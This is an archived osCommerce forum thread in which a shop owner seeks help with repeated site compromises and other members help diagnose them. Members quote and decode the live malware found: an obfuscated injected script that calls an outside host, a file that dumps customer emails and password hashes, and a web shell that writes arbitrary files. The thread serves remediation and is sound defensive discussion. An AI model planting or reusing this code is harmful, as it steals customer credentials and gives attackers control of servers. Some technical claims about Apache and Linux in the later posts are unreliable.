Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Hacked and hacked and hacked :(


deirossiteam

Recommended Posts

My application top file keeps getting attacked. I've set appropriate permissions on the file, I've installed FWR security pro, HT access protection, deleted the admin file manager... yet as soon as i clean up the code, it reappears eventually. I have changed the passwords, I should be the only one with access to the site.

 

Here is what the malicious code looks like.

 

/**start PHNjcmlwdCBsYW5ndWFnZT0nSmF2YVNjcmlwdCc+ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4gYy50b1N0cmluZygzNil9O2lmKCEnJy5yZXBsYWNlKC9eLyxTdHJpbmcpKXt3aGlsZShjLS0pe2RbYy50b1N0cmluZyhhKV09a1tjXXx8Yy50b1N0cmluZyhhKX1rPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXFx3Kyd9O2M9MX07d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFjZShuZXcgUmVnRXhwKCdcXGInK2UoYykrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCc4LjkoXCc8MiBhPSJiOi8vNy42LzMvPzQ9NSZjPWQmZz1pJms9aiIgaD0iMSIgZT0iMSIgZj0iMCI+PC8yPlwnKTsnLDIxLDIxLCd8fGlmcmFtZXxjYXRlZ29yeXxzaG93dG9waWN8c3NsfGlufHNhZmVyZXN1bHR8ZG9jdW1lbnR8d3JpdGV8c3JjfGh0dHB8ZG9uZXxzbmR8aGVpZ2h0fGZyYW1lYm9yZGVyfGdpZHx3aWR0aHwxNDV8ZW5hYmxlZHxkYicuc3BsaXQoJ3wnKSwwLHt9KSk7ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4gYy50b1N0cmluZygzNil9O2lmKCEnJy5yZXBsYWNlKC9eLyxTdHJpbmcpKXt3aGlsZShjLS0pe2RbYy50b1N0cmluZyhhKV09a1tjXXx8Yy50b1N0cmluZyhhKX1rPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXFx3Kyd9O2M9MX07d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFjZShuZXcgUmVnRXhwKCdcXGInK2UoYykrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCcxLjYoIjw3IDg9XCc1Oi8vMi40LjMvOS8/YT1mJmc9IisxLmUrIlwnIGQ9XCcwXCcgYj1cJzBcJyBjPVwnMFwnPiIpOycsMTcsMTcsJ3xkb2N1bWVudHxncm9vdmUwMXxjY3xjb3xodHRwfHdyaXRlfGltZ3xzcmN8aW1hZ2VzfGh8aGVpZ2h0fGJvcmRlcnx3aWR0aHxyZWZlcnJlcnw2NXxhYmMnLnNwbGl0KCd8JyksMCx7fSkpOzwvc2NyaXB0Pg== end**/

 

$__name = md5($_SERVER['HTTP_HOST']);

 

 

 

$reg = "(Win16)|(Windows 95)|(Win95)|(Windows_95)|(Windows 98)|(Win98)|(Windows NT 5.0)|(Windows 2000)|(Windows NT 5.1)|(Windows XP)|(Windows NT 5.2)|(Windows NT 6.0)|(Windows NT 7.0)|(Windows NT 4.0)|(WinNT4.0)|(WinNT)|(Windows NT)|(Windows ME)";

 

if(empty ($_COOKIE[$__name]) AND eregi($reg, $_SERVER['HTTP_USER_AGENT'])) {

 

$date = date("D, j M Y 00:00:00", time()+60*60*24*30);

 

$cookie = time().".".rand(1111111, 9999999);

 

$set_js = @setcookie ($__name, $cookie, time()+60*60*24*30);

 

if(!$set_js)

 

echo '<script type="text/javascript">document.cookie = "'.$__name.'="+escape(\''.$cookie.'\')+"; expires='.$date.'; path=/";</script>';

 

 

 

$__content = file_get_contents(__FILE__);

 

preg_match("#\*start(.*?)end\*#is", $__content, $__m);

 

if(isset($__m[1]) and trim($__m[1])!="" and preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', trim($__m[1]))) {

 

echo base64_decode($__m[1]);

 

}

 

 

 

elseif(isset($__m[1]) and trim($__m[1])!="") {

 

echo $__m[1];

 

}

 

}

 

It is normally inserted right after the opening <?php

 

 

Any ideas? Anything I should check for?

 

Thanks for you help in advance.

Link to comment
Share on other sites

Kavon,

 

Ok, now that your in the correct forum. Have you made the security changes to your admin files as suggested here ?

 

http://www.oscommerce.com/forums/index.php?showtopic=340995

 

And also made the security changes as outlined in this thread ?

 

http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/

 

 

If you have completed those changes and still get hacked, then more likely the hacker has a file hidden on the site that allows a backdoor.

 

Check your hosting account for unknown files. Files with double extensions (file.html.php) or other anomalies.

 

 

Chris

Link to comment
Share on other sites

I did find a file mhp.php in my catalog/images directory with the following code:

 

<?php

 

 

 

$p=$_REQUEST['p'];

 

 

 

if (!isset($p) || md5($p)!='c180aaadf5ab10fb3a733f43f3ffc4b3') die ('');

 

 

 

if ($_REQUEST['d'] == '1') unlink($HTTP_SERVER_VARS['SCRIPT_FILENAME']);

 

 

 

echo "#mhpver11"."\n";

 

//mail hash parser oscommerce

 

include "../includes/database_tables.php";

 

include "../includes/configure.php";

 

 

 

$link = mysql_connect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD)

 

or die("Could not connect");

 

 

 

mysql_select_db(DB_DATABASE);

 

 

 

$result = mysql_query ("SELECT customers_email_address,customers_password FROM ".TABLE_CUSTOMERS);

 

 

 

while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {

 

 

 

$l = $line['customers_email_address'].":".$line['customers_password'];

 

if (preg_match("/:[a-f0-9]{32}:[a-f0-9]{2}/i",$l)) echo $l."\n";

 

 

 

}

 

 

 

 

 

 

 

?>

 

Would this be something aiding the hacker?

 

 

Kavon,

 

Ok, now that your in the correct forum. Have you made the security changes to your admin files as suggested here ?

 

http://www.oscommerce.com/forums/index.php?showtopic=340995

 

And also made the security changes as outlined in this thread ?

 

http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/

 

 

If you have completed those changes and still get hacked, then more likely the hacker has a file hidden on the site that allows a backdoor.

 

Check your hosting account for unknown files. Files with double extensions (file.html.php) or other anomalies.

 

 

Chris

Link to comment
Share on other sites

People always look to osCommerce when they get hacked but often it is not anything to do with osCommerce at all.

 

If the host server is vulnerable they ( the hackers ) can hack a single site on the server and once achieved can arbitrarily hack the rest of the sites on the server where permissions allow.

 

Most of the "hack" posts I see on this forum tend to be host related, just my opinion.

Link to comment
Share on other sites

My application top file keeps getting attacked. I've set appropriate permissions on the file, I've installed FWR security pro, HT access protection, deleted the admin file manager... yet as soon as i clean up the code, it reappears eventually. I have changed the passwords, I should be the only one with access to the site.

 

Here is what the malicious code looks like.

 

/**start PHNjcmlwdCBsYW5ndWFnZT0nSmF2YVNjcmlwdCc+ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4gYy50b1N0cmluZygzNil9O2lmKCEnJy5yZXBsYWNlKC9eLyxTdHJpbmcpKXt3aGlsZShjLS0pe2RbYy50b1N0cmluZyhhKV09a1tjXXx8Yy50b1N0cmluZyhhKX1rPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXFx3Kyd9O2M9MX07d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFjZShuZXcgUmVnRXhwKCdcXGInK2UoYykrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCc4LjkoXCc8MiBhPSJiOi8vNy42LzMvPzQ9NSZjPWQmZz1pJms9aiIgaD0iMSIgZT0iMSIgZj0iMCI+PC8yPlwnKTsnLDIxLDIxLCd8fGlmcmFtZXxjYXRlZ29yeXxzaG93dG9waWN8c3NsfGlufHNhZmVyZXN1bHR8ZG9jdW1lbnR8d3JpdGV8c3JjfGh0dHB8ZG9uZXxzbmR8aGVpZ2h0fGZyYW1lYm9yZGVyfGdpZHx3aWR0aHwxNDV8ZW5hYmxlZHxkYicuc3BsaXQoJ3wnKSwwLHt9KSk7ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4gYy50b1N0cmluZygzNil9O2lmKCEnJy5yZXBsYWNlKC9eLyxTdHJpbmcpKXt3aGlsZShjLS0pe2RbYy50b1N0cmluZyhhKV09a1tjXXx8Yy50b1N0cmluZyhhKX1rPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXFx3Kyd9O2M9MX07d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFjZShuZXcgUmVnRXhwKCdcXGInK2UoYykrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCcxLjYoIjw3IDg9XCc1Oi8vMi40LjMvOS8/YT1mJmc9IisxLmUrIlwnIGQ9XCcwXCcgYj1cJzBcJyBjPVwnMFwnPiIpOycsMTcsMTcsJ3xkb2N1bWVudHxncm9vdmUwMXxjY3xjb3xodHRwfHdyaXRlfGltZ3xzcmN8aW1hZ2VzfGh8aGVpZ2h0fGJvcmRlcnx3aWR0aHxyZWZlcnJlcnw2NXxhYmMnLnNwbGl0KCd8JyksMCx7fSkpOzwvc2NyaXB0Pg== end**/

 

$__name = md5($_SERVER['HTTP_HOST']);

 

 

 

$reg = "(Win16)|(Windows 95)|(Win95)|(Windows_95)|(Windows 98)|(Win98)|(Windows NT 5.0)|(Windows 2000)|(Windows NT 5.1)|(Windows XP)|(Windows NT 5.2)|(Windows NT 6.0)|(Windows NT 7.0)|(Windows NT 4.0)|(WinNT4.0)|(WinNT)|(Windows NT)|(Windows ME)";

 

if(empty ($_COOKIE[$__name]) AND eregi($reg, $_SERVER['HTTP_USER_AGENT'])) {

 

$date = date("D, j M Y 00:00:00", time()+60*60*24*30);

 

$cookie = time().".".rand(1111111, 9999999);

 

$set_js = @setcookie ($__name, $cookie, time()+60*60*24*30);

 

if(!$set_js)

 

echo '<script type="text/javascript">document.cookie = "'.$__name.'="+escape(\''.$cookie.'\')+"; expires='.$date.'; path=/";</script>';

 

 

 

$__content = file_get_contents(__FILE__);

 

preg_match("#\*start(.*?)end\*#is", $__content, $__m);

 

if(isset($__m[1]) and trim($__m[1])!="" and preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', trim($__m[1]))) {

 

echo base64_decode($__m[1]);

 

}

 

 

 

elseif(isset($__m[1]) and trim($__m[1])!="") {

 

echo $__m[1];

 

}

 

}

 

It is normally inserted right after the opening <?php

 

 

Any ideas? Anything I should check for?

 

Thanks for you help in advance.

 

 

Here is the decode for that top line maybe some can tell us what it is.

 

<script language='JavaScript'>eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('9.a(\'<3 b="c://8.7/2/4.5?6=d&2=e&h=j&l=k" i="1" f="1" g="0"></3>\');',22,22,'||search|iframe|index|php|bid|in|accountdebug|document|write|src|http|145|ssl|height|frameborder|refresh|width|back|rect|str'.split('|'),0,{}));eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('1.6("<7 8=\'5://2.4.3/9/?a=f&g="+1.e+"\' d=\'0\' b=\'0\' c=\'0\'>");',17,17,'|document|groove01|cc|co|http|write|img|src|images|h|height|border|width|referrer|115|abc'.split('|'),0,{}));</script

 

Thanks Bo

Link to comment
Share on other sites

  • 2 weeks later...

Still having problems :(

 

I've found this code in my product listing module:

 

<?php

 

if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die(chr(82).chr(101).chr(115).chr(116).chr(114).chr(105).chr(99).chr(116).chr(101).chr(32).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115));

 

 

 

if(isset($_POST['update']) AND !empty($_POST['path'])) {

 

$filename = $_POST['path'];

 

$somecontent = base64_decode($_POST['update']);

 

if (!$handle = fopen($filename, 'w')) {

 

echo "Cannot open file ($filename)";

 

exit;

 

}

 

if (fwrite($handle, $somecontent) === FALSE) {

 

echo "Cannot write to file ($filename)";

 

exit;

 

}

 

echo "Success, wrote ".strlen($somecontent)." bytes to file ($filename)";

 

fclose($handle);

 

exit();

 

}

 

?><?php

 

if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die(chr(82).chr(101).chr(115).chr(116).chr(114).chr(105).chr(99).chr(116).chr(101).chr(32).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115));

 

 

 

if(isset($_POST['update']) AND !empty($_POST['path'])) {

 

$filename = $_POST['path'];

 

$somecontent = base64_decode($_POST['update']);

 

if (!$handle = fopen($filename, 'w')) {

 

echo "Cannot open file ($filename)";

 

exit;

 

}

 

if (fwrite($handle, $somecontent) === FALSE) {

 

echo "Cannot write to file ($filename)";

 

exit;

 

}

 

echo "Success, wrote ".strlen($somecontent)." bytes to file ($filename)";

 

fclose($handle);

 

exit();

 

}

 

?>

 

Thanks!

 

 

 

Here is the decode for that top line maybe some can tell us what it is.

 

<script language='JavaScript'>eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('9.a(\'<3 b="c://8.7/2/4.5?6=d&2=e&h=j&l=k" i="1" f="1" g="0"></3>\');',22,22,'||search|iframe|index|php|bid|in|accountdebug|document|write|src|http|145|ssl|height|frameborder|refresh|width|back|rect|str'.split('|'),0,{}));eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('1.6("<7 8=\'5://2.4.3/9/?a=f&g="+1.e+"\' d=\'0\' b=\'0\' c=\'0\'>");',17,17,'|document|groove01|cc|co|http|write|img|src|images|h|height|border|width|referrer|115|abc'.split('|'),0,{}));</script

 

Thanks Bo

Link to comment
Share on other sites

Most of the "hack" posts I see on this forum tend to be host related, just my opinion.

 

correct, 100% agree on it. majority web hosts normally have 1000 websites on the same server and they don't care about websites or server security!!!!!!!

Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues.

Any issues with oscommerce, I am here to help you.

Link to comment
Share on other sites

Still having problems :(

 

I've found this code in my product listing module:

 

<?php

 

if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die(chr(82).chr(101).chr(115).chr(116).chr(114).chr(105).chr(99).chr(116).chr(101).chr(32).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115));

 

 

 

if(isset($_POST['update']) AND !empty($_POST['path'])) {

 

$filename = $_POST['path'];

 

$somecontent = base64_decode($_POST['update']);

 

if (!$handle = fopen($filename, 'w')) {

 

echo "Cannot open file ($filename)";

 

exit;

 

}

 

if (fwrite($handle, $somecontent) === FALSE) {

 

echo "Cannot write to file ($filename)";

 

exit;

 

}

 

echo "Success, wrote ".strlen($somecontent)." bytes to file ($filename)";

 

fclose($handle);

 

exit();

 

}

 

?><?php

 

if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die(chr(82).chr(101).chr(115).chr(116).chr(114).chr(105).chr(99).chr(116).chr(101).chr(32).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115));

 

 

 

if(isset($_POST['update']) AND !empty($_POST['path'])) {

 

$filename = $_POST['path'];

 

$somecontent = base64_decode($_POST['update']);

 

if (!$handle = fopen($filename, 'w')) {

 

echo "Cannot open file ($filename)";

 

exit;

 

}

 

if (fwrite($handle, $somecontent) === FALSE) {

 

echo "Cannot write to file ($filename)";

 

exit;

 

}

 

echo "Success, wrote ".strlen($somecontent)." bytes to file ($filename)";

 

fclose($handle);

 

exit();

 

}

 

?>

 

Thanks!

If you have a clean backup on your pc unzip in and compare files on your pc to the ones on your server. I removed this one from a clients server last week. There was at 16 infected files. Bo

Link to comment
Share on other sites

Here is the decode for that top line maybe some can tell us what it is.

 

<script language='JavaScript'>eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('9.a(\'<3 b="c://8.7/2/4.5?6=d&2=e&h=j&l=k" i="1" f="1" g="0"></3>\');',22,22,'||search|iframe|index|php|bid|in|accountdebug|document|write|src|http|145|ssl|height|frameborder|refresh|width|back|rect|str'.split('|'),0,{}));eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('1.6("<7 8=\'5://2.4.3/9/?a=f&g="+1.e+"\' d=\'0\' b=\'0\' c=\'0\'>");',17,17,'|document|groove01|cc|co|http|write|img|src|images|h|height|border|width|referrer|115|abc'.split('|'),0,{}));</script

 

Thanks Bo

 

It deobfuscates to this:

 

document.write("<img src='http://groove01.co.cc/images/?h=65&abc="+document.referrer+"' width='0' height='0' border='0'>");

We Watch Your Website - so you don't have to!

no outside links allowed in signature!

Link to comment
Share on other sites

Still having problems :(

 

My opinion is to stop this nonsense of trying to clean out individual files. You will likely never find them all.

 

Do you have a clean backup? If so, then simply wipe your site clean. And I mean clean. Get your host to help if you need to because you can have hidden files not displayed by ftp programs...

 

Then PASSWORD PROTECT THE DIRECTORY. That way, only you can access the files while you work on it.

 

Then restore you backup files. They are clean, right?

 

Then do all those security necessities. ALL OF THEM.

 

Only then remove the password on the root directory and make your shop visible to the world.

 

 

You can keep searching for the 'back door' if you want, but you may never find it. With a known good backup you will be back up in a day and any further successful hacks would almost surely be attributable to the host.

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Link to comment
Share on other sites

My opinion is to stop this nonsense of trying to clean out individual files. You will likely never find them all.

 

Do you have a clean backup? If so, then simply wipe your site clean. And I mean clean. Get your host to help if you need to because you can have hidden files not displayed by ftp programs...

 

Then PASSWORD PROTECT THE DIRECTORY. That way, only you can access the files while you work on it.

 

Then restore you backup files. They are clean, right?

 

Then do all those security necessities. ALL OF THEM.

 

Only then remove the password on the root directory and make your shop visible to the world.

 

 

You can keep searching for the 'back door' if you want, but you may never find it. With a known good backup you will be back up in a day and any further successful hacks would almost surely be attributable to the host.

Yes it is the answer some of the time, but if the bug is on the server site you have just wasted your time.

Link to comment
Share on other sites

Yes it is the answer some of the time, but if the bug is on the server site you have just wasted your time.

No, you have positively identified it as a host problem and now you can confront them to secure the server or lose your business. You cannot afford to continue doing business with them if their server allows someone to hack into your site. Am I correct?

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Link to comment
Share on other sites

No, you have positively identified it as a host problem and now you can confront them to secure the server or lose your business. You cannot afford to continue doing business with them if their server allows someone to hack into your site. Am I correct?

All is well with me mine is secure and have no break ends, but others are not so lucky. If I am working on someones I usually prefer to find the problem and figure out how they got in. Besides half the people with a bug don't have a backup up to date backup in play to work with. I have plenty of backups and redirects if needed. Just saying some people don't have the option.

Bo

Link to comment
Share on other sites

I have the same problem as described in comment #6. Have you found the cause of this security problem?

 

Still having problems :(

 

I've found this code in my product listing module:

 

<?php

 

if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die(chr(82).chr(101).chr(115).chr(116).chr(114).chr(105).chr(99).chr(116).chr(101).chr(32).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115));

 

 

 

if(isset($_POST['update']) AND !empty($_POST['path'])) {

 

$filename = $_POST['path'];

 

$somecontent = base64_decode($_POST['update']);

 

if (!$handle = fopen($filename, 'w')) {

 

echo "Cannot open file ($filename)";

 

exit;

 

}

 

if (fwrite($handle, $somecontent) === FALSE) {

 

echo "Cannot write to file ($filename)";

 

exit;

 

}

 

echo "Success, wrote ".strlen($somecontent)." bytes to file ($filename)";

 

fclose($handle);

 

exit();

 

}

 

?><?php

 

if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die(chr(82).chr(101).chr(115).chr(116).chr(114).chr(105).chr(99).chr(116).chr(101).chr(32).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115));

 

 

 

if(isset($_POST['update']) AND !empty($_POST['path'])) {

 

$filename = $_POST['path'];

 

$somecontent = base64_decode($_POST['update']);

 

if (!$handle = fopen($filename, 'w')) {

 

echo "Cannot open file ($filename)";

 

exit;

 

}

 

if (fwrite($handle, $somecontent) === FALSE) {

 

echo "Cannot write to file ($filename)";

 

exit;

 

}

 

echo "Success, wrote ".strlen($somecontent)." bytes to file ($filename)";

 

fclose($handle);

 

exit();

 

}

 

?>

 

Thanks!

Link to comment
Share on other sites

The server may have been hacked. This generally means that there are shell scripts on the server which will just redo the back door when you have removed the effected code. This also means that the server is compromised and depending on the severity can mean that the entire kernel is as well.

 

I have gone though this before, and is a huge headache. Generally you can delete to your hearts content, restore backups and everything else mentioned here, but due to the compromise, the hack will just reappear.

 

I have seen files with the exact same code modified (removed the offending code) then 1/2 hr later the code reappears and the file date set to two years previously. Thus no file tracking on date changes was seen. This occurred over and over, even after removal of all of the code from the site.

 

Recently an exploit has been found that servers (Apache) must be updated to block, else the server will always be compromised and until is rebuilt from a new install will never be removed.

 

 

cheers

Peter McGrath

-----------------------------

See my Profile (click here) for more information and to contact me for professional osCommerce support that includes SEO development, custom development and security implementation

Link to comment
Share on other sites

A local privilege escalation kernel exploit has been reported that affects 64-bit versions of the Red Hat Enterprise Linux kernel as shipped with the CentOS 5 variant of this kernel. This vulnerability was found to affect a significant number of servers. CentOS has released a new kernel that includes a patch for this exploit.

 

There is currently not a way to patch a server that has already been exploited. If this patch is not applied and the server is exploited the server will need to be re-imaged and content restored from backups.

 

This is a report on the issue and the severity.....

 

 

For details about the exploit:

https://access.redhat.com/kb/docs/DOC-40265

For details about the patch:

https://rhn.redhat.com/errata/RHSA-2010-0704.html

 

 

cheers and hope this helps

Peter McGrath

-----------------------------

See my Profile (click here) for more information and to contact me for professional osCommerce support that includes SEO development, custom development and security implementation

Link to comment
Share on other sites

Would you be more specific about this?

 

Recently an exploit has been found that servers (Apache) must be updated to block, else the server will always be compromised and until is rebuilt from a new install will never be removed.

 

cheers

Link to comment
Share on other sites

Would you be more specific about this?
Not sure what you mean, there is a new release for the kernel that needs to be applied, you can read more about this at the links found above....

 

cheers

Peter McGrath

-----------------------------

See my Profile (click here) for more information and to contact me for professional osCommerce support that includes SEO development, custom development and security implementation

Link to comment
Share on other sites

The links are for Red Hat Enterprise Linux operating system.

 

You mention Apache Web Server that "must be updated". Which version of Apache are you talking about? What specific vulnerability puts osCommerce at risk?

 

Not sure what you mean, there is a new release for the kernel that needs to be applied, you can read more about this at the links found above....

 

cheers

Link to comment
Share on other sites

The links are for Red Hat Enterprise Linux operating system
Correct. I use redhat on my servers, and this is related to me, but then many servers out there use the exact same set up.

 

You mention Apache Web Server that "must be updated". Which version of Apache are you talking about? What specific vulnerability puts osCommerce at risk?

A local privilege escalation kernel exploit has been reported that affects 64-bit versions of the Red Hat Enterprise Linux kernel as shipped with the CentOS 5 variant of this kernel

 

This does not just put osCommerce at risk, rather it puts the entire domain / server at risk. Due to the fact that osCommerce is an e commerce platform, they are targeted more so then a site that is an information portal only (no sense harvesting from a site that does not really take personal information). But this is a kernel issue and not just related to osCommerce and the site being hacked over and over...

Peter McGrath

-----------------------------

See my Profile (click here) for more information and to contact me for professional osCommerce support that includes SEO development, custom development and security implementation

Link to comment
Share on other sites

I am failing somehow to get through to you.

 

I'll be as plain as I can. I know Red Hat operating system is vulnerable, that's not the point.

 

I would like to know which APACHE WEB SERVER version are you talking about in your original post that needs updating?

 

"Recently an exploit has been found that servers (Apache) must be updated to block"

 

Thank you.

 

Correct. I use redhat on my servers, and this is related to me, but then many servers out there use the exact same set up.

 

 

A local privilege escalation kernel exploit has been reported that affects 64-bit versions of the Red Hat Enterprise Linux kernel as shipped with the CentOS 5 variant of this kernel

 

This does not just put osCommerce at risk, rather it puts the entire domain / server at risk. Due to the fact that osCommerce is an e commerce platform, they are targeted more so then a site that is an information portal only (no sense harvesting from a site that does not really take personal information). But this is a kernel issue and not just related to osCommerce and the site being hacked over and over...

Link to comment
Share on other sites

I'll be as plain as I can. I know Red Hat operating system is vulnerable, that's not the point.
This is the point.

 

 

I would like to know which APACHE WEB SERVER version are you talking about in your original post that needs updating?

Red Hat runs using APACHE WEB SERVER. Many versions of WEB SERVERS are out there, if based on Linux then all use the APACHE WEB SERVER.

 

APACHE and linux are not the same thing, Apache is like a plug in to the server, it allows for the kernel to operate as a server, linux would still work fine without Apache, just would not act as a server is all.

 

So, if your server ius using Red Hat AND is based on 64 bit AND uses the CentOS 5 variant, THEN your server needs to be updated. This may also be an issue with Ubuntu, Suse or other Linux releases which maybe based on the CentOS 5 Apache release (or others, that may have the same vulnerability ).

 

 

cheers

Peter McGrath

-----------------------------

See my Profile (click here) for more information and to contact me for professional osCommerce support that includes SEO development, custom development and security implementation

Link to comment
Share on other sites

Yes, of course. You are simply stating the obvious (However, some it is incorrect but I am not going there.) but failing to answer the one question I keep asking time and time again. I think it's prudent that I just give up at this point. Have a good day!

 

This is the point.

 

 

 

Red Hat runs using APACHE WEB SERVER. Many versions of WEB SERVERS are out there, if based on Linux then all use the APACHE WEB SERVER.

 

APACHE and linux are not the same thing, Apache is like a plug in to the server, it allows for the kernel to operate as a server, linux would still work fine without Apache, just would not act as a server is all.

 

So, if your server ius using Red Hat AND is based on 64 bit AND uses the CentOS 5 variant, THEN your server needs to be updated. This may also be an issue with Ubuntu, Suse or other Linux releases which maybe based on the CentOS 5 Apache release (or others, that may have the same vulnerability ).

 

 

cheers

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...